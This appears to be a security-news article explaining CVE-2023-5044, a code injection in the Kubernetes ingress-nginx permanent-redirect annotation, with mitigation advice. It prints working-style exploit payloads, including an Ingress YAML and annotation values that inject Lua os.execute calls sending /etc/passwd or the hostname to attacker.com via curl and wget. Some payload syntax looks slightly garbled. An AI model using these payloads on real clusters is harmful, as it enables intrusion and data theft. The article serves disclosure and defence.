CVE CyberSecurity Database News

CVE-2023-5044 - Code Injection via `nginx.ingress.kubernetes.io/permanent-redirect` Annotation Exploit Explained

Poster -

Kubernetes has become a standard for running containerized applications, and NGINX Ingress is one of the most popular ways to expose services. However, even simple misconfigurations or overlooked features can open the door to severe security risks. CVE-2023-5044 is a clear example, allowing attackers to inject and execute arbitrary commands through a commonly used annotation: nginx.ingress.kubernetes.io/permanent-redirect.

In this guide, we’ll break down CVE-2023-5044, explain how the attack works, demonstrate a code exploit, and give you the resources you need to understand this vulnerability.

What is CVE-2023-5044?

CVE-2023-5044 is a command/code injection vulnerability in the NGINX Ingress Controller for Kubernetes. It affects versions prior to v1.8. (source). The core of the issue: Ingress resources with the nginx.ingress.kubernetes.io/permanent-redirect annotation can be tricked into injecting malicious NGINX configuration.

Attackers with the ability to create or edit Ingress objects—the baseline Kubernetes RBAC permissions for developers or app operators—could exploit this to execute arbitrary commands in the controller pod, potentially leading to cluster compromise.

How Does the Exploit Work?

The annotation nginx.ingress.kubernetes.io/permanent-redirect allows users to define an HTTP 301 redirection for incoming requests handled by the Ingress. Internally, the value defined is inserted directly into the generated NGINX configuration file without proper escaping or sanitization.

This means that if an annotation value contains special characters and NGINX directives—or even shell commands apended as Lua code—they may get executed by the ingress controller.

Suppose an Ingress object includes the annotation

nginx.ingress.kubernetes.io/permanent-redirect: 'https://attacker.com;';

Now, consider if an attacker uses a more malicious value

nginx.ingress.kubernetes.io/permanent-redirect: 'https://evil.com";; lua_code_cache off; content_by_lua_block { os.execute("curl attacker.com/$(cat /etc/passwd | base64)") }; #'

When NGINX parses this, it executes the injected Lua code—here, it reads the pod’s /etc/passwd file, base64-encodes it, and sends it to attacker's server.

Malicious Ingress YAML

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: exploit-ingress
  namespace: default
  annotations:
    nginx.ingress.kubernetes.io/permanent-redirect: 'https://example.com";; lua_code_cache off; content_by_lua_block { os.execute("wget http://attacker.com/$(hostname)";) }; #'
spec:
  rules:
  - host: vulnerable-app.local
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: any-service
            port:
              number: 80

What happens?

- NGINX interprets everything after the https://example.com";; as valid configuration.

The content_by_lua_block directive injects Lua code.

- os.execute("wget http://attacker.com/$(hostname)";) runs in the NGINX process (as root or nginx user!), sending the pod’s hostname to attacker.com.

You can see this in the generated NGINX config inside the running Ingress controller

server {
    #...
    return 301 https://example.com";; lua_code_cache off; content_by_lua_block { os.execute("wget http://attacker.com/$(hostname)";) }; #$request_uri;
}

If you see suspicious NGINX configuration or outgoing traffic to an attacker’s domain, you may have been exploited.

Information Disclosure: Attackers can steal secrets, service account tokens, or sensitive data.

- Privilege Escalation & Lateral Movement: From ingress controller to other pods or even the K8s API.

Mitigation & Fixes

1. Patch Immediately: Upgrade to Ingress-NGINX v1.8.+ (release notes).
2. Audit Ingress YAML: Search for suspicious annotation values, especially ones containing ", ;, or Lua code.
3. Restrict RBAC: Only grant necessary users permission to create/edit Ingress objects.

Official References

- Kubernetes Ingress-NGINX Security Advisory
- Public Issue & Reproduction
- CVE Details
- Mitigation & Upgrade Guidance

Final Thoughts

CVE-2023-5044 is a stark reminder that even small missteps in Kubernetes annotations can lead to massive security problems. This vulnerability is easy to exploit, especially inside compromised or mismanaged clusters. Always sanitize inputs, lock down RBAC, and keep your ingress controllers up to date.

If you operate Kubernetes clusters, you should patch your ingress-nginx controller today and review Ingress objects for unsafe annotation values. A single annotation can lead to a complete cluster compromise—don't leave the backdoor open!

Timeline

Published on: 10/25/2023 20:15:18 UTC
Last modified on: 11/02/2023 17:45:26 UTC